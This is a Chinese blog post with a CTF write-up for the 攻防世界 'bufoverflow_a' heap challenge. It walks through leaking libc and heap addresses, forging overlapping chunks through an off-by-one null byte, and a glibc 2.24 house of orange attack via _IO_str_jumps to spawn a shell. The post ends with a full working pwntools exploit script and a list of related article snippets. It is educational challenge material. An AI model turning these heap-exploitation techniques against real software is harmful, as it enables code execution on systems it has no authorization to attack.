攻防世界PWN之bufoverflow_a题解(house of orange in 2.24&house of Einherjar)

最新推荐文章于 2023-02-10 11:27:25 发布
最新推荐文章于 2023-02-10 11:27:25 发布
阅读量1k 收藏
点赞数 1
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 PWN CTF 缓冲区溢出 二进制漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104390952
版权
pwn 同时被 3 个专栏收录
161 篇文章 26 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏

bufoverflow_a

首先,我们检查一下程序的保护机制

然后,我们用IDA分析一下,是一个经典的增删改查的程序,然后我们看到创建堆时,前两个堆是用malloc创建,后面的堆用calloc创建,这意味着,如果要泄露libc地址,只能靠前两个堆,后面的堆从bin里取出后会清空里面的信息。

Fill功能存在一个null off by one漏洞

我们每次只能对最后创建的那个堆进行读写操作

并且delete以后,指针将清空,就无法进行读写操作,除非重新创建一个堆。

首先是泄露libc地址,这个很容易,创建一个unsorted bin范围的堆,然后后面再创建一个堆用来隔离,释放后再申请回来显示,即可泄露。

  1. #0  
  2. create(0x80)  
  3. #1  
  4. create(0x80)  
  5. delete(0)  
  6. delete(1)  
  7. #0申请回来,此时保留了libc指针  
  8. create(0x80)  
  9. show()  

接下来,我们要泄露堆地址,我们创建large bin范围的堆释放后申请一个比它还大的堆,使得它被放入large bin,从而堆上保留了堆指针,再申请回来。但是堆地址保存在fd_nextsize处,位于chunk_addr + 0x10处,我们如果直接显示,只能显示出fd的内容,因为后面有’\x00’结束了。并且,我们也不能利用fill来填充到fd_nextsize处,因为fill,内容的最后会添加一个’\x00’

这样,我们仍然不能显示出fd_nextsize的内容。

  1. #1  
  2. create(0x400) #large bin范围的堆释放后会有堆地址  
  3. create(0x80) #2  
  4. #1放入unsorted bin  
  5. delete(1)  
  6. #触发整理unsorted bin,将1放入large bin,从而1里堆有指针  
  7. create(0x500) #1  
  8. delete(1)  

目前,堆的布局是这样的

堆编号

大小

状态

0

0x90

used

1

0x410

free

2

0x90

used

Top chunk

 

 

在chunk1的数据域+0x10处,有堆指针。我们可以先释放chunk2,使得chunk12合并到top chunk,这样,堆布局变成了这样,但是里面的信息仍然没有清空。

堆编号

大小

状态

0

0x90

used

Top chunk

 

 

然后,我们继续释放chunk0,此时堆布局就只剩下一个TOP chunk

堆编号

大小

状态

Top chunk

 

 

接下来,我们申请一个0xA0大小的堆(数据域大小0x90)。因为bin里面没有合适的chunk,就从TOP chunk里划分,堆布局变成这样

堆编号

大小

状态

0

0xA0

used

Top chunk

 

 

然后,我们继续申请一个堆,大小任意,比如0x90

此时堆布局变成这样

堆编号

大小

状态

0

0xA0

used

1

0x90

used

Top chunk

 

 

由于chunk0大小为0xA0,比原先大了0x10,那么chunk1就会向后偏移0x10,也就是原来chunk1fd_nextsize位置是现在chunk1fd位置,这样,我们显示,就能泄露出堆地址了。

  1. #释放堆2,由于堆2下面是top块,堆2上面的堆1也是free状态,那么就和全部合并到top块里,但里面的指针信息仍然有保留。  
  2. delete(2)  
  3. #此时,堆0下面的堆1top块,释放0后,堆0也合并到了top块里。  
  4. delete(0)  
  5. #所有bin都合并了,只剩下一个top  
  6. #错位0x10,使得接下来1fd位置正好有堆指针  
  7. create(0x90) #0  
  8. create(0x80) #1  
  9. show()  
  10. sh.recv(1)  
  11. heap_base = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00')) - 0xB0  
  12. print 'heap_base=',hex(heap_base)  
  13. #============================================  
  14. delete(0)  
  15. delete(1)  

我们泄露完信息后,又重新把0和1给释放了,使得他们重新合并到top chunk里。因为我们不需要再用它们了。并且由于只有前两个堆使用malloc分配,后面的用calloc分配,为了后续利用,我们要腾出位置。

接下来,我们就要伪造堆了。我们最终的目的是要构造出这样的堆布局

Unsorted bin1

Unsorted bin2

 

这样,我们就能从unsorted bin1里申请合适的堆,控制unsorted bin2,从而利用house of orange来getshell。

那么,我们就先来伪造chunk

  1. #0  
  2. create(0x208)  
  3. fake_chunk = 'a'*0x20  
  4. fake_chunk += p64(0) + p64(0x1E1)  
  5. #fd=bk=p绕过检查  
  6. fake_chunk += p64(heap_base + 0x50)*2  
  7. fake_chunk = fake_chunk.ljust(0x200,'a')  
  8. fake_chunk += p64(0x1E0)  
  9. fill(fake_chunk)  
  10. #1  
  11. create(0x80)  
  12. #2注意,2必须为0xF0,这样实际为0x100off by null one后大小仍为0x100,与top chunk相邻,才能合并到top chunk  
  13. #因此不能在2末尾伪造fake_chunk  
  14. create(0xF0)  
  15. fill('b'*0xF0)  
  16.   
  17. delete(1)  
  18. #1  
  19. create(0x88)  
  20. fill('b'*0x80 + p64(0x270))  
  21. #合并  
  22. delete(2)  

需要注意的是,以前,为了绕过glibc中的检查

  1. if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                    
  2.   malloc_printerr ("corrupted double-linked list");  

我们这样操作的

  1. p->fd = &p-3*4  
  2. p->bk = &p-2*4  

但是,现在我们没有办法满足这个条件,我们直接这样

  1. p->fd = p  
  2. p->bk = p  

还有就是,我们的chunk2,包括头结构的总大小为0x100,不能再多也不能再少。

因为null off by one,可以将下一个chunk的size低一字节覆盖为0,因此,size必须大于1字节。但是如果size大于0x100,这意味着,覆盖以后,这个chunk变小了,我们还需在这个chunk的末尾伪造一个填充chunk。这样会使得待会利用时,由于有填充chunk把它与top chunk隔离,使得它不与top chunk合并。而我们的目的是要把fake_chunk合并到top chunk里,这样我们就能构造出包含的unsorted bin

经过这样的操作,我们的堆布局变成这样

堆编号

大小

状态

0

 

0x210

used

Top chunk

1

0x90

used

2

0x100

free

着色区域全都在top chunk里面,现在,我们就可以来构造两个包含的unsorted bin。

我们先来构造0和1构成的unsorted bin,为了能够顺利delete掉0和1,我们需要复原1和2的头结构相关信息。

  1. ####注意
  2. create(0x290) #2
  3. #重新复原12堆的头信息  
  4. fill('a'*0x1D0 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x101) + '\n')  
  5. #为了delete后我们的内容不被清空或填充,
  6. #我们需要把chunk1也给剔除,这样我们后面申请的时候,才不会被mallocopt设置free后的填充物
  7. #注意顺序!!!
  8. delete(1)  
  9. delete(0)  

由于top chunk在fake_chunk处,因此,我们申请时,从top chunk里切割就是从fake_chunk处开始切割。这样,我们就得到了最外层的unsorted bin。

然后,我们要开始构造内层的unsorted bin,那么我们需要释放fake_chunk。而fake_chunk此时位于index 2。接下来,我们申请堆,肯定会从我们辛苦得到的外层unsorted bin里切割,没关系,待会用完重新释放回去。在程序中的堆指针数组中下标2的地方保存着fake_chunk的地址,我们现在的目的是要成功释放fake_chunk2。但是,fake_chunk前后的chunk头信息已经被打乱,我们不能直接释放。

我们可以从外层unsorted bin里申请一个大点的堆,然后,我们要在这个堆里重新伪造fake_chunk,已经一个填充chunk,由于绕过检查。也就是说,我们要在原来的fake_chunk里面末尾腾出一点位置,制造一个填充chunk,就可以绕过检查了。

  1. #重新从外层的unsorted bin切割一块空间  
  2. create(0x290) #0  
  3. #fake_chunk里腾出位置伪造填充块,而这个chunk0末尾也要放一个填充块绕过检查  
  4. #也就是总共要伪造三个chunk,总大小要等于这个chunk0的大小,即0x290  
  5. fill('a'*0x20 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x151) + '\n')  
  6. delete(0) #得到外层unsorted bin  
  7. delete(2) #得到内层unsorted bin  
  8. create(0x290)  
  9. #现在,我们已经可以控制unsorted bin  

这样,我们就控制了内层的unsorted bin。那么我们就可以利用house of orange了。

本题,提供的libc版本是2.24,因此增加了对vtable的检查。

  1. IO_validate_vtable (const struct _IO_jump_t *vtable)  
  2. {  
  3.   /* Fast path: The vtable pointer is within the __libc_IO_vtables 
  4.      section.  */  
  5.   uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;  
  6.   const char *ptr = (const char *) vtable;  
  7.   uintptr_t offset = ptr - __start___libc_IO_vtables;  
  8.   if (__glibc_unlikely (offset >= section_length))  
  9.     /* The vtable pointer is not in the expected section.  Use the 
  10.        slow path, which will terminate the process if necessary.  */  
  11.     _IO_vtable_check ();  
  12.   return vtable;  
  13. }  

也就是vtable指针必须在__stop___IO_vtables 和 __start___libc_IO_vtables范围之内。因此,我们可以利用__IO_str_jumps来绕过

  1. {  
  2.   JUMP_INIT_DUMMY,  
  3.   JUMP_INIT(finish, _IO_str_finish),  
  4.   JUMP_INIT(overflow, _IO_str_overflow),  
  5.   JUMP_INIT(underflow, _IO_str_underflow),  
  6.   JUMP_INIT(uflow, _IO_default_uflow),  
  7.   JUMP_INIT(pbackfail, _IO_str_pbackfail),  
  8.   JUMP_INIT(xsputn, _IO_default_xsputn),  
  9.   JUMP_INIT(xsgetn, _IO_default_xsgetn),  
  10.   JUMP_INIT(seekoff, _IO_str_seekoff),  
  11.   JUMP_INIT(seekpos, _IO_default_seekpos),  
  12.   JUMP_INIT(setbuf, _IO_default_setbuf),  
  13.   JUMP_INIT(sync, _IO_default_sync),  
  14.   JUMP_INIT(doallocate, _IO_default_doallocate),  
  15.   JUMP_INIT(read, _IO_default_read),  
  16.   JUMP_INIT(write, _IO_default_write),  
  17.   JUMP_INIT(seek, _IO_default_seek),  
  18.   JUMP_INIT(close, _IO_default_close),  
  19.   JUMP_INIT(stat, _IO_default_stat),  
  20.   JUMP_INIT(showmanyc, _IO_default_showmanyc),  
  21.   JUMP_INIT(imbue, _IO_default_imbue)  
  22. };  

我们可以利用_IO_str_finish函数里的这个

  1. _IO_str_finish (FILE *fp, int dummy)  
  2. {  
  3.   if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))  
  4.     (((_IO_strfile *) fp)->_s._free_buffer) (fp->_IO_buf_base);  
  5.   fp->_IO_buf_base = NULL;  
  6.   _IO_default_finish (fp, 0);  
  7. }  

我们把vtable指向__IO_str_jumps,把fp->_free_buffer指向system函数,把fp->_IO_buf_base指向/bin/sh字符串,再伪造其他字段,绕过检查,这样就能触发调用system(“/bin/sh”)了。同理_IO_str_overflow类似。

  1. #house of orange in 2.24  
  2. fake_file = p64(0) + p64(0x60)  
  3. #unsorted bin attack,修改_IO_list_allmain_arena+88  
  4. fake_file += p64(0) + p64(_IO_list_all_addr-0x10)  
  5. #_IO_write_base < _IO_write_ptr  
  6. fake_file += p64(0) + p64(1)  
  7. #_IO_write_end IO_buf_base  
  8. fake_file += p64(0) + p64(binsh_addr)  
  9. fake_file = fake_file.ljust(0xD8,'\x00')  
  10. #vtable指针,同时,也作为fake_vtable__dummy  
  11. fake_file += p64(_IO_str_jumps_addr - 8)  
  12. #__dummy2__finish  
  13. fake_file += p64(0) + p64(system_addr)  

如果没有getshell,是由于栈环境问题,多试几次就行了。

综上,我们的exp脚本

#coding:utf8
from pwn import *

sh = process('./bufoverflow_a')
#sh = remote('111.198.29.45',34863)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
#libc = ELF('./libc.so.6')
_IO_list_all_s = libc.symbols['_IO_list_all']
malloc_hook_s =  libc.symbols['__malloc_hook']
system_s = libc.sym['system']
binsh_s = libc.search('/bin/sh').next()

def create(size):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('Size:',str(size))

def delete(index):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('Index:',str(index))

def fill(content):
   sh.sendlineafter('>>','3')
   sh.sendafter('Content:',content)

def show():
   sh.sendlineafter('>>','4')

def get_IO_str_jumps():
   IO_file_jumps_offset = libc.sym['_IO_file_jumps']
   IO_str_underflow_offset = libc.sym['_IO_str_underflow']
   for ref_offset in libc.search(p64(IO_str_underflow_offset)):
       possible_IO_str_jumps_offset = ref_offset - 0x20
       if possible_IO_str_jumps_offset > IO_file_jumps_offset:
          print possible_IO_str_jumps_offset
          return possible_IO_str_jumps_offset
#==============泄露libc相关地址============
#0
create(0x80)
#1
create(0x80)
delete(0)
delete(1)
#0申请回来,此时保留了libc指针
create(0x80)
show()
sh.recv(1)
#泄露信息
main_arena_xx = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) +  (malloc_hook_s & 0XFFF)
libc_base = malloc_hook_addr - malloc_hook_s
_IO_list_all_addr = libc_base + _IO_list_all_s
_IO_str_jumps_addr = libc_base + get_IO_str_jumps()
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
print 'libc_base=',hex(libc_base)
print '_IO_list_all_addr=',hex(_IO_list_all_addr)
print 'system_addr=',hex(system_addr)
#===========泄露堆地址====================
#1
create(0x400) #large bin范围的堆释放后会有堆地址
create(0x80) #2
#将1放入unsorted bin
delete(1)
#触发整理unsorted bin,将1放入large bin,从而1里堆有指针
create(0x500) #1
delete(1)
#释放堆2,由于堆2下面是top块,堆2上面的堆1也是free状态,那么就和全部合并到top块里,但里面的指针信息仍然有保留。
delete(2)
#此时,堆0下面的堆1是top块,释放0后,堆0也合并到了top块里。
delete(0)
#所有bin都合并了,只剩下一个top块
#错位0x10,使得接下来1的fd位置正好有堆指针
create(0x90) #0
create(0x80) #1
show()
sh.recv(1)
heap_base = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00')) - 0xB0
print 'heap_base=',hex(heap_base)
#============================================
delete(0)
delete(1)
#0
create(0x208)
fake_chunk = 'a'*0x20
fake_chunk += p64(0) + p64(0x1E1)
#让fd=bk=p绕过检查
fake_chunk += p64(heap_base + 0x50)*2
fake_chunk = fake_chunk.ljust(0x200,'a')
fake_chunk += p64(0x1E0)
fill(fake_chunk)
#1
create(0x80)
#2注意,2必须为0xF0,这样实际为0x100,off by null one后大小仍为0x100,与top chunk相邻,才能合并到top chunk
#因此不能在2末尾伪造fake_chunk
create(0xF0)
fill('b'*0xF0)

delete(1)
#1
create(0x88)
fill('b'*0x80 + p64(0x270))
#合并
delete(2)
####注意
create(0x290) #2
#重新复原1、2堆的头信息
fill('a'*0x1D0 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x101) + '\n')
#为了delete后我们的内容不被清空或填充,
#我们需要把chunk1也给剔除,这样我们后面申请的时候,才不会被mallocopt设置free后的填充物
#注意顺序!!!
delete(1)
delete(0)

#重新从外层的unsorted bin切割一块空间
create(0x290) #0
#在fake_chunk里腾出位置伪造填充块,而这个chunk0末尾也要放一个填充块绕过检查
#也就是总共要伪造三个chunk,总大小要等于这个chunk0的大小,即0x290
fill('a'*0x20 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x151) + '\n')
delete(0) #得到外层unsorted bin
delete(2) #得到内层unsorted bin
create(0x290)
#现在,我们已经可以控制unsorted bin了
payload = 'a'*0x20
#house of orange in 2.24
fake_file = p64(0) + p64(0x60)
#unsorted bin attack,修改_IO_list_all为main_arena+88
fake_file += p64(0) + p64(_IO_list_all_addr-0x10)
#_IO_write_base < _IO_write_ptr
fake_file += p64(0) + p64(1)
#_IO_write_end 、IO_buf_base
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xD8,'\x00')
#vtable指针,同时,也作为fake_vtable的__dummy
fake_file += p64(_IO_str_jumps_addr - 8)
#__dummy2、__finish
fake_file += p64(0) + p64(system_addr)
payload += fake_file
payload += '\n'
fill(payload)
#getshell
create(0x80)

sh.interactive()

 

攻防世界pwnhouse_of_grey——Linux系统文件初探
PLpa的博客
03-06 1046
前言: 此题涉及到Linux的两个系统文件:maps和mem,不了解的可以看科普(传送门)。 64位,保护全开,打开IDA64看看程序到底是怎么设计的。 可以看到程序首先打开系统,然后用mmap映射了一片区域,并对fn函数进行操作,我们双击进入fn函数看看情况: fn函数里边又5个功能,没个功能都有用途,分析一下每个功能: 第一个功能从字面意思看就知道是用来定位文件,然后打开他,但是不能打...
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1656
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界bufoverflow_a
weixin_43960998的博客
04-09 297
1.程序逆向 简单的逆向,记一下几个地方:当chunk数大于2时,便使用 calloc 分配并且 free 后会进行填充: 关于 mallopt 见这里。 漏洞出现在 fill 功能中,存在 off by null。 show 输出遇 0 截断。 2.漏洞利用&限制条件 off by null chunk size 无限制 可以泄漏地址 chunk 只有两个 show 遇 ‘\x00’ 截断 可以无限次 edit     由于能够正常 malloc
攻防世界 pwn 进阶 bufoverflow_a
yongbaoii的博客
03-13 461
保护一片绿。 菜单堆。 alloc delete fill show
PWNHouse of Orange&House of Pig(待完整例题)
u014377094的博客
05-06 716
House of Orange House of Orange的利用背景在缺少free条件。为了达到free的效果,通过修改top chunk的size位,当malloc的空间大于top chunk时触发brk,使top chunk被放置在unsorted bin。 利用条件: 1.堆有 mmap 和 brk 两种分配方式,我们需要让堆以 brk 的形式拓展,之后原有的 top chunk 会被置于 unsorted bin 中。要实现 brk 拓展 top chunk,但是要实现这个目的需要绕过一.
CTF-PWN-house-of-orange (unsortedbin attack+IO_FILE文件结构利用)
SuperGate的博客
02-22 1020
程序综述 [*] '/home/supergate/Desktop/Pwn/houseoforange' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: ...
攻防世界PWNbufoverflow_b题解
seaaseesa的博客
02-19 803
bufoverflow_b 这题和bufferoverflow_a类似,只是在输入的时候,增加了一个检查 遇到空字符就会截断,这将不利于我们在chunk里伪造数据。 另外增加了一个功能,不过我没有使用到。 遇到’\x00’就会截断,但是我们仍然可以完整的把我们的伪造数据放进去。 比如,我们要在偏移0x30处写一个数据0x0000000000123456,我们先把0x30处的8字节...
攻防世界pwn题 -- secret file 题解
lifanxin的博客
12-24 956
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本 知识点关键字 栈溢出,popen函数,openssl sha256函数 样本 样本来自攻防世界pwn题 – secret file 运行 查看文件属性   所有保护全开 运行样本程序   本地运行会报一个错误即缺少一个libc动态链接库   该库是openssl开源库,用来实现一些加密算法的,这里给出libcrypto.so.1.1,报错的可以添加到自己本地,使用如下代码在本地/usr/lib下创建一个软链接就行。 ln -s libcrypt
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
在网络安全领域,特别是针对Pwn(破解)类竞赛,"jmp_rsp"是一个常见的技术概念,主要涉及栈溢出漏洞的利用。广东大学生网络攻防大赛中的这个“jmp_rsp”题目显然是设计来测试参赛者对这类漏洞的理解和利用能力。...
2020-11-09学习记录:攻防世界pwn之echo_back
eeeeeight的博客
11-09 291
今天就算是世界毁灭,我也要更新博客,容我先睡一觉
攻防世界bufoverflow_b
weixin_43960998的博客
04-09 173
其他部分与 bufoverflow_a一样,但是 b 中多了一个检查: 这里不能输入空字节,这样的话就不能像 a 中直接布置,这样会破坏掉前面的字段,需要倒着布置。还有一个需要注意的就是,在触发 off by null 时 a 中可以一次性的布置好 pre_size 和 pre_inuse 位,但是在本题中则需要先覆盖 next chunk 的 pre_inuse 位,然后再清理填充的字节,布置 pre_size 位,再触发: # pad = '1'*0x80 + p64(0x270) add(0x88)
house of orange
inquisiter
01-20 432
house of orange 本次笔记基于看雪 看雪CTF.TSRC 2018 团队赛 第十四题 这个东西好像在新版的libc.so中不太好用,不过有点意思记录下吧。 house of orange 1.分配一个堆块 2.溢出topchunk修改size 3.申请超出size的堆,topchunk进入unsorted bin。 4.申请小于size的堆,old_top分为两块。 5. p...
PWN技巧之_IO_FILE结构体利用house of orange
aptx4869_li的博客
02-16 1164
PWN技巧之_IO_FILE结构体利用house of orange
house of orange学习报告
qq_35467337的博客
03-08 852
house of orangehouse of orange 不是什么梗,而是一道题目的名字,记录下hitcon 2016ctf house of orange
攻防世界 pwn 进阶 bufoverflow_b
yongbaoii的博客
03-13 261
bufoverflow_b差不多,就是多了个检查。 所以先看看bufoverflow_a 说跟bufoverflow_a差不多是为啥,因为它就是在输入的时候检查多了一项。 这个是bufoverflow_a 这个是bufoverflow_b 这个题会检查我们的输入是不是\x00,意思是会被\x00截断,那么我们在输入数据的时候就会麻烦一些。 那我们怎么去解决这个烦恼,我们这里利用大佬的方法。 在我们向内存中写地址的时候内存中一定会有一些垃圾数据,我们写数据的时候,假如我们要写入一个地址,在内存中小端序
2016-HitCon-Pwn-house_of_orange学习(附赠FSOP基础知识)
a2590035252的博客
10-25 680
[md]这里开始著名的house of orange利用方式讲解 house of orange 介绍 House of Orange 与其他的 House of XX 利用方法不同,这种利用方法来自于 Hitcon CTF 2016 中的一道同名题目。由于这种利用方法在此前的 CTF 题目中没有出现过,因此之后出现的一系列衍生题目的利用方法我们称之为 House of Orange。 概述 House of Orange 的利用比较特殊,首先需要目标漏洞是堆上的漏洞但是特殊之处在于题目中不存在 free
CTFHub[技能树]-----House of orange
最新发布
saulgoodman的博客
02-10 254
House of orange也是我第一次学,边学边做题,来来回回折腾了8小时,代码检查了一遍又一遍,没问题但总是打不成功,最后百度查了一下这个是概率成功,我哭了。白白浪费了这么久时间。
攻防世界 进阶 houseoforange
yongbaoii的博客
03-12 724
就是house of orange 跟题目名字一摸一样。 保护 绿油油 build 备注一写顿时简单了起来。 结构分析一下。 那orange的颜色要么就是56746,要么就是0到6. see 然后呢这里56746跟30到36输出是不一样的。 upgrade 房子只能申请三个,改也只能改三次。 对修改的大小没有限制,所以就会有堆溢出。 那问题来了,怎么利用? 他没有free函数,这就是标准的house of orange 我们总体的思路是这样的。 创建第一个house,修改top_chunk的siz
Hitcon CTF 2016 - house of orange 做题笔记
fa1c4的blog
03-31 1285
前言 深入学习pwn的高级堆利用方法, house of orange是绕不开的难关 之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house漏洞 现在避无可避了, 于是准备集中精力突破掉house of orange 想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~ 分析过程 CTFhub和BUUCTF的题目有差别, 就按BUU来打吧 漏洞利用 总结 参考 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值